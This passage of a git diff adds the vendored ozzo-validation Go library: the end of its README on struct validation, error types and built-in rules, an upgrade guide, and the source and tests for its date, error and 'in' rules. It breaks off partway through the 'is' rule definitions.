fmt.Println(err) + // Output: + // Street: the length must be between 5 and 50; State: must be in a valid format. +} +``` + +Note that when calling `validation.ValidateStruct` to validate a struct, you should pass to the method a pointer +to the struct instead of the struct itself. Similarly, when calling `validation.Field` to specify the rules +for a struct field, you should use a pointer to the struct field. + +When the struct validation is performed, the fields are validated in the order they are specified in `ValidateStruct`. +And when each field is validated, its rules are also evaluated in the order they are associated with the field. +If a rule fails, an error is recorded for that field, and the validation will continue with the next field. 
+ + +### Validation Errors + +The `validation.ValidateStruct` method returns validation errors found in struct fields in terms of `validation.Errors` +which is a map of fields and their corresponding errors. Nil is returned if validation passes. + +By default, `validation.Errors` uses the struct tags named `json` to determine what names should be used to +represent the invalid fields. The type also implements the `json.Marshaler` interface so that it can be marshaled +into a proper JSON object. For example, + +```go +type Address struct { + Street string `json:"street"` + City string `json:"city"` + State string `json:"state"` + Zip string `json:"zip"` +} + +// ...perform validation here... + +err := a.Validate() +b, _ := json.Marshal(err) +fmt.Println(string(b)) +// Output: +// {"street":"the length must be between 5 and 50","state":"must be in a valid format"} +``` + +You may modify `validation.ErrorTag` to use a different struct tag name. + +If you do not like the magic that `ValidateStruct` determines error keys based on struct field names or corresponding +tag values, you may use the following alternative approach: + +```go +c := Customer{ + Name: "Qiang Xue", + Email: "q", + Address: Address{ + State: "Virginia", + }, +} + +err := validation.Errors{ + "name": validation.Validate(c.Name, validation.Required, validation.Length(5, 20)), + "email": validation.Validate(c.Name, validation.Required, is.Email), + "zip": validation.Validate(c.Address.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))), +}.Filter() +fmt.Println(err) +// Output: +// email: must be a valid email address; zip: cannot be blank. +``` + +In the above example, we build a `validation.Errors` by a list of names and the corresponding validation results. +At the end we call `Errors.Filter()` to remove from `Errors` all nils which correspond to those successful validation +results. The method will return nil if `Errors` is empty. 
+ +The above approach is very flexible as it allows you to freely build up your validation error structure. You can use +it to validate both struct and non-struct values. Compared to using `ValidateStruct` to validate a struct, +it has the drawback that you have to redundantly specify the error keys while `ValidateStruct` can automatically +find them out. + + +### Internal Errors + +Internal errors are different from validation errors in that internal errors are caused by malfunctioning code (e.g. +a validator making a remote call to validate some data when the remote service is down) rather +than the data being validated. When an internal error happens during data validation, you may allow the user to resubmit +the same data to perform validation again, hoping the program resumes functioning. On the other hand, if data validation +fails due to data error, the user should generally not resubmit the same data again. + +To differentiate internal errors from validation errors, when an internal error occurs in a validator, wrap it +into `validation.InternalError` by calling `validation.NewInternalError()`. The user of the validator can then check +if a returned error is an internal error or not. For example, + +```go +if err := a.Validate(); err != nil { + if e, ok := err.(validation.InternalError); ok { + // an internal error happened + fmt.Println(e.InternalError()) + } +} +``` + + +## Validatable Types + +A type is validatable if it implements the `validation.Validatable` interface. + +When `validation.Validate` is used to validate a validatable value, if it does not find any error with the +given validation rules, it will further call the value's `Validate()` method. + +Similarly, when `validation.ValidateStruct` is validating a struct field whose type is validatable, it will call +the field's `Validate` method after it passes the listed rules. 
+ +In the following example, the `Address` field of `Customer` is validatable because `Address` implements +`validation.Validatable`. Therefore, when validating a `Customer` struct with `validation.ValidateStruct`, +validation will "dive" into the `Address` field. + +```go +type Customer struct { + Name string + Gender string + Email string + Address Address +} + +func (c Customer) Validate() error { + return validation.ValidateStruct(&c, + // Name cannot be empty, and the length must be between 5 and 20. + validation.Field(&c.Name, validation.Required, validation.Length(5, 20)), + // Gender is optional, and should be either "Female" or "Male". + validation.Field(&c.Gender, validation.In("Female", "Male")), + // Email cannot be empty and should be in a valid email format. + validation.Field(&c.Email, validation.Required, is.Email), + // Validate Address using its own validation rules + validation.Field(&c.Address), + ) +} + +c := Customer{ + Name: "Qiang Xue", + Email: "q", + Address: Address{ + Street: "123 Main Street", + City: "Unknown", + State: "Virginia", + Zip: "12345", + }, +} + +err := c.Validate() +fmt.Println(err) +// Output: +// Address: (State: must be in a valid format.); Email: must be a valid email address. +``` + +Sometimes, you may want to skip the invocation of a type's `Validate` method. To do so, simply associate +a `validation.Skip` rule with the value being validated. + + +### Maps/Slices/Arrays of Validatables + +When validating a map, slice, or array, whose element type implements the `validation.Validatable` interface, +the `validation.Validate` method will call the `Validate` method of every non-nil element. +The validation errors of the elements will be returned as `validation.Errors` which maps the keys of the +invalid elements to their corresponding validation errors. 
For example, + +```go +addresses := []Address{ + Address{State: "MD", Zip: "12345"}, + Address{Street: "123 Main St", City: "Vienna", State: "VA", Zip: "12345"}, + Address{City: "Unknown", State: "NC", Zip: "123"}, +} +err := validation.Validate(addresses) +fmt.Println(err) +// Output: +// 0: (City: cannot be blank; Street: cannot be blank.); 2: (Street: cannot be blank; Zip: must be in a valid format.). +``` + +When using `validation.ValidateStruct` to validate a struct, the above validation procedure also applies to those struct +fields which are map/slices/arrays of validatables. + + +### Pointers + +When a value being validated is a pointer, most validation rules will validate the actual value pointed to by the pointer. +If the pointer is nil, these rules will skip the validation. + +An exception is the `validation.Required` and `validation.NotNil` rules. When a pointer is nil, they +will report a validation error. + + +### Types Implementing `sql.Valuer` + +If a data type implements the `sql.Valuer` interface (e.g. `sql.NullString`), the built-in validation rules will handle +it properly. In particular, when a rule is validating such data, it will call the `Value()` method and validate +the returned value instead. + + +### Required vs. Not Nil + +When validating input values, there are two different scenarios about checking if input values are provided or not. + +In the first scenario, an input value is considered missing if it is not entered or it is entered as a zero value +(e.g. an empty string, a zero integer). You can use the `validation.Required` rule in this case. + +In the second scenario, an input value is considered missing only if it is not entered. A pointer field is usually +used in this case so that you can detect if a value is entered or not by checking if the pointer is nil or not. +You can use the `validation.NotNil` rule to ensure a value is entered (even if it is a zero value). 
+ + +### Embedded Structs + +The `validation.ValidateStruct` method will properly validate a struct that contains embedded structs. In particular, +the fields of an embedded struct are treated as if they belong directly to the containing struct. For example, + +```go +type Employee struct { + Name string +} + +func () + +type Manager struct { + Employee + Level int +} + +m := Manager{} +err := validation.ValidateStruct(&m, + validation.Field(&m.Name, validation.Required), + validation.Field(&m.Level, validation.Required), +) +fmt.Println(err) +// Output: +// Level: cannot be blank; Name: cannot be blank. +``` + +In the above code, we use `&m.Name` to specify the validation of the `Name` field of the embedded struct `Employee`. +And the validation error uses `Name` as the key for the error associated with the `Name` field as if `Name` a field +directly belonging to `Manager`. + +If `Employee` implements the `validation.Validatable` interface, we can also use the following code to validate +`Manager`, which generates the same validation result: + +```go +func (e Employee) Validate() error { + return validation.ValidateStruct(&e, + validation.Field(&e.Name, validation.Required), + ) +} + +err := validation.ValidateStruct(&m, + validation.Field(&m.Employee), + validation.Field(&m.Level, validation.Required), +) +fmt.Println(err) +// Output: +// Level: cannot be blank; Name: cannot be blank. +``` + + +## Built-in Validation Rules + +The following rules are provided in the `validation` package: + +* `In(...interface{})`: checks if a value can be found in the given list of values. +* `Length(min, max int)`: checks if the length of a value is within the specified range. + This rule should only be used for validating strings, slices, maps, and arrays. +* `RuneLength(min, max int)`: checks if the length of a string is within the specified range. 
+ This rule is similar as `Length` except that when the value being validated is a string, it checks + its rune length instead of byte length. +* `Min(min interface{})` and `Max(max interface{})`: checks if a value is within the specified range. + These two rules should only be used for validating int, uint, float and time.Time types. +* `Match(*regexp.Regexp)`: checks if a value matches the specified regular expression. + This rule should only be used for strings and byte slices. +* `Date(layout string)`: checks if a string value is a date whose format is specified by the layout. + By calling `Min()` and/or `Max()`, you can check additionally if the date is within the specified range. +* `Required`: checks if a value is not empty (neither nil nor zero). +* `NotNil`: checks if a pointer value is not nil. Non-pointer values are considered valid. +* `NilOrNotEmpty`: checks if a value is a nil pointer or a non-empty value. This differs from `Required` in that it treats a nil pointer as valid. +* `Skip`: this is a special rule used to indicate that all rules following it should be skipped (including the nested ones). + +The `is` sub-package provides a list of commonly used string validation rules that can be used to check if the format +of a value satisfies certain requirements. Note that these rules only handle strings and byte slices and if a string + or byte slice is empty, it is considered valid. You may use a `Required` rule to ensure a value is not empty. 
+Below is the whole list of the rules provided by the `is` package: + +* `Email`: validates if a string is an email or not +* `URL`: validates if a string is a valid URL +* `RequestURL`: validates if a string is a valid request URL +* `RequestURI`: validates if a string is a valid request URI +* `Alpha`: validates if a string contains English letters only (a-zA-Z) +* `Digit`: validates if a string contains digits only (0-9) +* `Alphanumeric`: validates if a string contains English letters and digits only (a-zA-Z0-9) +* `UTFLetter`: validates if a string contains unicode letters only +* `UTFDigit`: validates if a string contains unicode decimal digits only +* `UTFLetterNumeric`: validates if a string contains unicode letters and numbers only +* `UTFNumeric`: validates if a string contains unicode number characters (category N) only +* `LowerCase`: validates if a string contains lower case unicode letters only +* `UpperCase`: validates if a string contains upper case unicode letters only +* `Hexadecimal`: validates if a string is a valid hexadecimal number +* `HexColor`: validates if a string is a valid hexadecimal color code +* `RGBColor`: validates if a string is a valid RGB color in the form of rgb(R, G, B) +* `Int`: validates if a string is a valid integer number +* `Float`: validates if a string is a floating point number +* `UUIDv3`: validates if a string is a valid version 3 UUID +* `UUIDv4`: validates if a string is a valid version 4 UUID +* `UUIDv5`: validates if a string is a valid version 5 UUID +* `UUID`: validates if a string is a valid UUID +* `CreditCard`: validates if a string is a valid credit card number +* `ISBN10`: validates if a string is an ISBN version 10 +* `ISBN13`: validates if a string is an ISBN version 13 +* `ISBN`: validates if a string is an ISBN (either version 10 or 13) +* `JSON`: validates if a string is in valid JSON format +* `ASCII`: validates if a string contains ASCII characters only +* `PrintableASCII`: validates if a string 
contains printable ASCII characters only +* `Multibyte`: validates if a string contains multibyte characters +* `FullWidth`: validates if a string contains full-width characters +* `HalfWidth`: validates if a string contains half-width characters +* `VariableWidth`: validates if a string contains both full-width and half-width characters +* `Base64`: validates if a string is encoded in Base64 +* `DataURI`: validates if a string is a valid base64-encoded data URI +* `CountryCode2`: validates if a string is a valid ISO3166 Alpha 2 country code +* `CountryCode3`: validates if a string is a valid ISO3166 Alpha 3 country code +* `DialString`: validates if a string is a valid dial string that can be passed to Dial() +* `MAC`: validates if a string is a MAC address +* `IP`: validates if a string is a valid IP address (either version 4 or 6) +* `IPv4`: validates if a string is a valid version 4 IP address +* `IPv6`: validates if a string is a valid version 6 IP address +* `DNSName`: validates if a string is valid DNS name +* `Host`: validates if a string is a valid IP (both v4 and v6) or a valid DNS name +* `Port`: validates if a string is a valid port number +* `MongoID`: validates if a string is a valid Mongo ID +* `Latitude`: validates if a string is a valid latitude +* `Longitude`: validates if a string is a valid longitude +* `SSN`: validates if a string is a social security number (SSN) +* `Semver`: validates if a string is a valid semantic version + +### Customizing Error Messages + +All built-in validation rules allow you to customize error messages. To do so, simply call the `Error()` method +of the rules. 
For example, + +```go +data := "2123" +err := validation.Validate(data, + validation.Required.Error("is required"), + validation.Match(regexp.MustCompile("^[0-9]{5}$")).Error("must be a string with five digits"), +) +fmt.Println(err) +// Output: +// must be a string with five digits +``` + + +## Creating Custom Rules + +Creating a custom rule is as simple as implementing the `validation.Rule` interface. The interface contains a single +method as shown below, which should validate the value and return the validation error, if any: + +```go +// Validate validates a value and returns an error if validation fails. +Validate(value interface{}) error +``` + +If you already have a function with the same signature as shown above, you can call `validation.By()` to turn +it into a validation rule. For example, + +```go +func checkAbc(value interface{}) error { + s, _ := value.(string) + if s != "abc" { + return errors.New("must be abc") + } + return nil +} + +err := validation.Validate("xyz", validation.By(checkAbc)) +fmt.Println(err) +// Output: must be abc +``` + + +### Rule Groups + +When a combination of several rules are used in multiple places, you may use the following trick to create a +rule group so that your code is more maintainable. + +```go +var NameRule = []validation.Rule{ + validation.Required, + validation.Length(5, 20), +} + +type User struct { + FirstName string + LastName string +} + +func (u User) Validate() error { + return validation.ValidateStruct(&u, + validation.Field(&u.FirstName, NameRule...), + validation.Field(&u.LastName, NameRule...), + ) +} +``` + +In the above example, we create a rule group `NameRule` which consists of two validation rules. We then use this rule +group to validate both `FirstName` and `LastName`. + + +## Credits + +The `is` sub-package wraps the excellent validators provided by the [govalidator](https://github.com/asaskevich/govalidator) package. 
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md b/vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md new file mode 100644 index 0000000000..8f11d03eaa --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md @@ -0,0 +1,46 @@ +# Upgrade Instructions + +## Upgrade from 2.x to 3.x + +* Instead of using `StructRules` to define struct validation rules, use `ValidateStruct()` to declare and perform + struct validation. The following code snippet shows how to modify your code: +```go +// 2.x usage +err := validation.StructRules{}. + Add("Street", validation.Required, validation.Length(5, 50)). + Add("City", validation.Required, validation.Length(5, 50)). + Add("State", validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))). + Add("Zip", validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))). + Validate(a) + +// 3.x usage +err := validation.ValidateStruct(&a, + validation.Field(&a.Street, validation.Required, validation.Length(5, 50)), + validation.Field(&a.City, validation.Required, validation.Length(5, 50)), + validation.Field(&a.State, validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))), + validation.Field(&a.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))), +) +``` + +* Instead of using `Rules` to declare a rule list and use it to validate a value, call `Validate()` with the rules directly. +```go +data := "example" + +// 2.x usage +rules := validation.Rules{ + validation.Required, + validation.Length(5, 100), + is.URL, +} +err := rules.Validate(data) + +// 3.x usage +err := validation.Validate(data, + validation.Required, + validation.Length(5, 100), + is.URL, +) +``` + +* The default struct tags used for determining error keys is changed from `validation` to `json`. You may modify + `validation.ErrorTag` to change it back. 
\ No newline at end of file diff --git a/vendor/github.com/go-ozzo/ozzo-validation/date.go b/vendor/github.com/go-ozzo/ozzo-validation/date.go new file mode 100644 index 0000000000..2dc3d583ad --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/date.go @@ -0,0 +1,84 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "time" +) + +type dateRule struct { + layout string + min, max time.Time + message string + rangeMessage string +} + +// Date returns a validation rule that checks if a string value is in a format that can be parsed into a date. +// The format of the date should be specified as the layout parameter which accepts the same value as that for time.Parse. +// For example, +// validation.Date(time.ANSIC) +// validation.Date("02 Jan 06 15:04 MST") +// validation.Date("2006-01-02") +// +// By calling Min() and/or Max(), you can let the Date rule to check if a parsed date value is within +// the specified date range. +// +// An empty value is considered valid. Use the Required rule to make sure a value is not empty. +func Date(layout string) *dateRule { + return &dateRule{ + layout: layout, + message: "must be a valid date", + rangeMessage: "the data is out of range", + } +} + +// Error sets the error message that is used when the value being validated is not a valid date. +func (r *dateRule) Error(message string) *dateRule { + r.message = message + return r +} + +// RangeError sets the error message that is used when the value being validated is out of the specified Min/Max date range. +func (r *dateRule) RangeError(message string) *dateRule { + r.rangeMessage = message + return r +} + +// Min sets the minimum date range. A zero value means skipping the minimum range validation. +func (r *dateRule) Min(min time.Time) *dateRule { + r.min = min + return r +} + +// Max sets the maximum date range. 
A zero value means skipping the maximum range validation. +func (r *dateRule) Max(max time.Time) *dateRule { + r.max = max + return r +} + +// Validate checks if the given value is a valid date. +func (r *dateRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil || IsEmpty(value) { + return nil + } + + str, err := EnsureString(value) + if err != nil { + return err + } + + date, err := time.Parse(r.layout, str) + if err != nil { + return errors.New(r.message) + } + + if !r.min.IsZero() && r.min.After(date) || !r.max.IsZero() && date.After(r.max) { + return errors.New(r.rangeMessage) + } + + return nil +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/date_test.go b/vendor/github.com/go-ozzo/ozzo-validation/date_test.go new file mode 100644 index 0000000000..342f1addf8 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/date_test.go @@ -0,0 +1,69 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package validation + +import ( + "testing" + "time" + + "github.com/stretchr/testify/assert" +) + +func TestDate(t *testing.T) { + tests := []struct { + tag string + layout string + value interface{} + err string + }{ + {"t1", time.ANSIC, "", ""}, + {"t2", time.ANSIC, "Wed Feb 4 21:00:57 2009", ""}, + {"t3", time.ANSIC, "Wed Feb 29 21:00:57 2009", "must be a valid date"}, + {"t4", "2006-01-02", "2009-11-12", ""}, + {"t5", "2006-01-02", "2009-11-12 21:00:57", "must be a valid date"}, + {"t6", "2006-01-02", "2009-1-12", "must be a valid date"}, + {"t7", "2006-01-02", "2009-01-12", ""}, + {"t8", "2006-01-02", "2009-01-32", "must be a valid date"}, + {"t9", "2006-01-02", 1, "must be either a string or byte slice"}, + } + + for _, test := range tests { + r := Date(test.layout) + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func TestDateRule_Error(t *testing.T) { + r := Date(time.ANSIC) + assert.Equal(t, "must be a valid date", r.message) + assert.Equal(t, "the data is out of range", r.rangeMessage) + r.Error("123") + r.RangeError("456") + assert.Equal(t, "123", r.message) + assert.Equal(t, "456", r.rangeMessage) +} + +func TestDateRule_MinMax(t *testing.T) { + r := Date(time.ANSIC) + assert.True(t, r.min.IsZero()) + assert.True(t, r.max.IsZero()) + r.Min(time.Now()) + assert.False(t, r.min.IsZero()) + assert.True(t, r.max.IsZero()) + r.Max(time.Now()) + assert.False(t, r.max.IsZero()) + + r2 := Date("2006-01-02").Min(time.Date(2000, 12, 1, 0, 0, 0, 0, time.UTC)).Max(time.Date(2020, 2, 1, 0, 0, 0, 0, time.UTC)) + assert.Nil(t, r2.Validate("2010-01-02")) + err := r2.Validate("1999-01-02") + if assert.NotNil(t, err) { + assert.Equal(t, "the data is out of range", err.Error()) + } + err2 := r2.Validate("2021-01-02") + if assert.NotNil(t, err2) { + assert.Equal(t, "the data is out of range", err2.Error()) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/error.go b/vendor/github.com/go-ozzo/ozzo-validation/error.go new file 
mode 100644 index 0000000000..d89d628573 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/error.go @@ -0,0 +1,89 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "encoding/json" + "fmt" + "sort" +) + +type ( + // Errors represents the validation errors that are indexed by struct field names, map or slice keys. + Errors map[string]error + + // InternalError represents an error that should NOT be treated as a validation error. + InternalError interface { + error + InternalError() error + } + + internalError struct { + error + } +) + +// NewInternalError wraps a given error into an InternalError. +func NewInternalError(err error) InternalError { + return &internalError{error: err} +} + +// InternalError returns the actual error that it wraps around. +func (e *internalError) InternalError() error { + return e.error +} + +// Error returns the error string of Errors. +func (es Errors) Error() string { + if len(es) == 0 { + return "" + } + + keys := []string{} + for key := range es { + keys = append(keys, key) + } + sort.Strings(keys) + + s := "" + for i, key := range keys { + if i > 0 { + s += "; " + } + if errs, ok := es[key].(Errors); ok { + s += fmt.Sprintf("%v: (%v)", key, errs) + } else { + s += fmt.Sprintf("%v: %v", key, es[key].Error()) + } + } + return s + "." +} + +// MarshalJSON converts the Errors into a valid JSON. +func (es Errors) MarshalJSON() ([]byte, error) { + errs := map[string]interface{}{} + for key, err := range es { + if ms, ok := err.(json.Marshaler); ok { + errs[key] = ms + } else { + errs[key] = err.Error() + } + } + return json.Marshal(errs) +} + +// Filter removes all nils from Errors and returns back the updated Errors as an error. +// If the length of Errors becomes 0, it will return nil. 
+func (es Errors) Filter() error { + for key, value := range es { + if value == nil { + delete(es, key) + } + } + if len(es) == 0 { + return nil + } + return es +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/error_test.go b/vendor/github.com/go-ozzo/ozzo-validation/error_test.go new file mode 100644 index 0000000000..e7ba9971bb --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/error_test.go @@ -0,0 +1,70 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestNewInternalError(t *testing.T) { + err := NewInternalError(errors.New("abc")) + if assert.NotNil(t, err.InternalError()) { + assert.Equal(t, "abc", err.InternalError().Error()) + } +} + +func TestErrors_Error(t *testing.T) { + errs := Errors{ + "B": errors.New("B1"), + "C": errors.New("C1"), + "A": errors.New("A1"), + } + assert.Equal(t, "A: A1; B: B1; C: C1.", errs.Error()) + + errs = Errors{ + "B": errors.New("B1"), + } + assert.Equal(t, "B: B1.", errs.Error()) + + errs = Errors{} + assert.Equal(t, "", errs.Error()) +} + +func TestErrors_MarshalMessage(t *testing.T) { + errs := Errors{ + "A": errors.New("A1"), + "B": Errors{ + "2": errors.New("B1"), + }, + } + errsJSON, err := errs.MarshalJSON() + assert.Nil(t, err) + assert.Equal(t, "{\"A\":\"A1\",\"B\":{\"2\":\"B1\"}}", string(errsJSON)) +} + +func TestErrors_Filter(t *testing.T) { + errs := Errors{ + "B": errors.New("B1"), + "C": nil, + "A": errors.New("A1"), + } + err := errs.Filter() + assert.Equal(t, 2, len(errs)) + if assert.NotNil(t, err) { + assert.Equal(t, "A: A1; B: B1.", err.Error()) + } + + errs = Errors{} + assert.Nil(t, errs.Filter()) + + errs = Errors{ + "B": nil, + "C": nil, + } + assert.Nil(t, errs.Filter()) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/example_test.go 
b/vendor/github.com/go-ozzo/ozzo-validation/example_test.go new file mode 100644 index 0000000000..c16face37e --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/example_test.go @@ -0,0 +1,130 @@ +package validation_test + +import ( + "fmt" + "regexp" + + "github.com/go-ozzo/ozzo-validation" + "github.com/go-ozzo/ozzo-validation/is" +) + +type Address struct { + Street string + City string + State string + Zip string +} + +type Customer struct { + Name string + Gender string + Email string + Address Address +} + +func (a Address) Validate() error { + return validation.ValidateStruct(&a, + // Street cannot be empty, and the length must be between 5 and 50 + validation.Field(&a.Street, validation.Required, validation.Length(5, 50)), + // City cannot be empty, and the length must be between 5 and 50 + validation.Field(&a.City, validation.Required, validation.Length(5, 50)), + // State cannot be empty, and must be a string consisting of two letters in upper case + validation.Field(&a.State, validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))), + // Zip cannot be empty, and must be a string consisting of five digits + validation.Field(&a.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))), + ) +} + +func (c Customer) Validate() error { + return validation.ValidateStruct(&c, + // Name cannot be empty, and the length must be between 5 and 20. + validation.Field(&c.Name, validation.Required, validation.Length(5, 20)), + // Gender is optional, and should be either "Female" or "Male". + validation.Field(&c.Gender, validation.In("Female", "Male")), + // Email cannot be empty and should be in a valid email format. 
+ validation.Field(&c.Email, validation.Required, is.Email), + // Validate Address using its own validation rules + validation.Field(&c.Address), + ) +} + +func Example() { + c := Customer{ + Name: "Qiang Xue", + Email: "q", + Address: Address{ + Street: "123 Main Street", + City: "Unknown", + State: "Virginia", + Zip: "12345", + }, + } + + err := c.Validate() + fmt.Println(err) + // Output: + // Address: (State: must be in a valid format.); Email: must be a valid email address. +} + +func Example_second() { + data := "example" + err := validation.Validate(data, + validation.Required, // not empty + validation.Length(5, 100), // length between 5 and 100 + is.URL, // is a valid URL + ) + fmt.Println(err) + // Output: + // must be a valid URL +} + +func Example_third() { + addresses := []Address{ + {State: "MD", Zip: "12345"}, + {Street: "123 Main St", City: "Vienna", State: "VA", Zip: "12345"}, + {City: "Unknown", State: "NC", Zip: "123"}, + } + err := validation.Validate(addresses) + fmt.Println(err) + // Output: + // 0: (City: cannot be blank; Street: cannot be blank.); 2: (Street: cannot be blank; Zip: must be in a valid format.). +} + +func Example_four() { + c := Customer{ + Name: "Qiang Xue", + Email: "q", + Address: Address{ + State: "Virginia", + }, + } + + err := validation.Errors{ + "name": validation.Validate(c.Name, validation.Required, validation.Length(5, 20)), + "email": validation.Validate(c.Email, validation.Required, is.Email), + "zip": validation.Validate(c.Address.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))), + }.Filter() + fmt.Println(err) + // Output: + // email: must be a valid email address; zip: cannot be blank. 
+} + +func Example_five() { + type Employee struct { + Name string + } + + type Manager struct { + Employee + Level int + } + + m := Manager{} + err := validation.ValidateStruct(&m, + validation.Field(&m.Name, validation.Required), + validation.Field(&m.Level, validation.Required), + ) + fmt.Println(err) + // Output: + // Level: cannot be blank; Name: cannot be blank. +} \ No newline at end of file diff --git a/vendor/github.com/go-ozzo/ozzo-validation/in.go b/vendor/github.com/go-ozzo/ozzo-validation/in.go new file mode 100644 index 0000000000..9673dd0ba7 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/in.go @@ -0,0 +1,43 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import "errors" + +// In returns a validation rule that checks if a value can be found in the given list of values. +// Note that the value being checked and the possible range of values must be of the same type. +// An empty value is considered valid. Use the Required rule to make sure a value is not empty. +func In(values ...interface{}) *inRule { + return &inRule{ + elements: values, + message: "must be a valid value", + } +} + +type inRule struct { + elements []interface{} + message string +} + +// Validate checks if the given value is valid or not. +func (r *inRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil || IsEmpty(value) { + return nil + } + + for _, e := range r.elements { + if e == value { + return nil + } + } + return errors.New(r.message) +} + +// Error sets the error message for the rule. 
+func (r *inRule) Error(message string) *inRule { + r.message = message + return r +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/in_test.go b/vendor/github.com/go-ozzo/ozzo-validation/in_test.go new file mode 100644 index 0000000000..ad0c87be80 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/in_test.go @@ -0,0 +1,44 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestIn(t *testing.T) { + var v int = 1 + var v2 *int + tests := []struct { + tag string + values []interface{} + value interface{} + err string + }{ + {"t0", []interface{}{1, 2}, 0, ""}, + {"t1", []interface{}{1, 2}, 1, ""}, + {"t2", []interface{}{1, 2}, 2, ""}, + {"t3", []interface{}{1, 2}, 3, "must be a valid value"}, + {"t4", []interface{}{}, 3, "must be a valid value"}, + {"t5", []interface{}{1, 2}, "1", "must be a valid value"}, + {"t6", []interface{}{1, 2}, &v, ""}, + {"t7", []interface{}{1, 2}, v2, ""}, + } + + for _, test := range tests { + r := In(test.values...) + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func Test_inRule_Error(t *testing.T) { + r := In(1, 2, 3) + assert.Equal(t, "must be a valid value", r.message) + r.Error("123") + assert.Equal(t, "123", r.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/is/rules.go b/vendor/github.com/go-ozzo/ozzo-validation/is/rules.go new file mode 100644 index 0000000000..ffbeef85b1 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/is/rules.go @@ -0,0 +1,138 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +// Package is provides a list of commonly used string validation rules. 
+package is + +import ( + "regexp" + "unicode" + + "github.com/asaskevich/govalidator" + "github.com/go-ozzo/ozzo-validation" +) + +var ( + // Email validates if a string is an email or not. + Email = validation.NewStringRule(govalidator.IsEmail, "must be a valid email address") + // URL validates if a string is a valid URL + URL = validation.NewStringRule(govalidator.IsURL, "must be a valid URL") + // RequestURL validates if a string is a valid request URL + RequestURL = validation.NewStringRule(govalidator.IsRequestURL, "must be a valid request URL") + // RequestURI validates if a string is a valid request URI + RequestURI = validation.NewStringRule(govalidator.IsRequestURI, "must be a valid request URI") + // Alpha validates if a string contains English letters only (a-zA-Z) + Alpha = validation.NewStringRule(govalidator.IsAlpha, "must contain English letters only") + // Digit validates if a string contains digits only (0-9) + Digit = validation.NewStringRule(isDigit, "must contain digits only") + // Alphanumeric validates if a string contains English letters and digits only (a-zA-Z0-9) + Alphanumeric = validation.NewStringRule(govalidator.IsAlphanumeric, "must contain English letters and digits only") + // UTFLetter validates if a string contains unicode letters only + UTFLetter = validation.NewStringRule(govalidator.IsUTFLetter, "must contain unicode letter characters only") + // UTFDigit validates if a string contains unicode decimal digits only + UTFDigit = validation.NewStringRule(govalidator.IsUTFDigit, "must contain unicode decimal digits only") + // UTFLetterNumeric validates if a string contains unicode letters and numbers only + UTFLetterNumeric = validation.NewStringRule(govalidator.IsUTFLetterNumeric, "must contain unicode letters and numbers only") + // UTFNumeric validates if a string contains unicode number characters (category N) only + UTFNumeric = validation.NewStringRule(isUTFNumeric, "must contain unicode number characters only") + // 
LowerCase validates if a string contains lower case unicode letters only + LowerCase = validation.NewStringRule(govalidator.IsLowerCase, "must be in lower case") + // UpperCase validates if a string contains upper case unicode letters only + UpperCase = validation.NewStringRule(govalidator.IsUpperCase, "must be in upper case") + // Hexadecimal validates if a string is a valid hexadecimal number + Hexadecimal = validation.NewStringRule(govalidator.IsHexadecimal, "must be a valid hexadecimal number") + // HexColor validates if a string is a valid hexadecimal color code + HexColor = validation.NewStringRule(govalidator.IsHexcolor, "must be a valid hexadecimal color code") + // RGBColor validates if a string is a valid RGB color in the form of rgb(R, G, B) + RGBColor = validation.NewStringRule(govalidator.IsRGBcolor, "must be a valid RGB color code") + // Int validates if a string is a valid integer number + Int = validation.NewStringRule(govalidator.IsInt, "must be an integer number") + // Float validates if a string is a floating point number + Float = validation.NewStringRule(govalidator.IsFloat, "must be a floating point number") + // UUIDv3 validates if a string is a valid version 3 UUID + UUIDv3 = 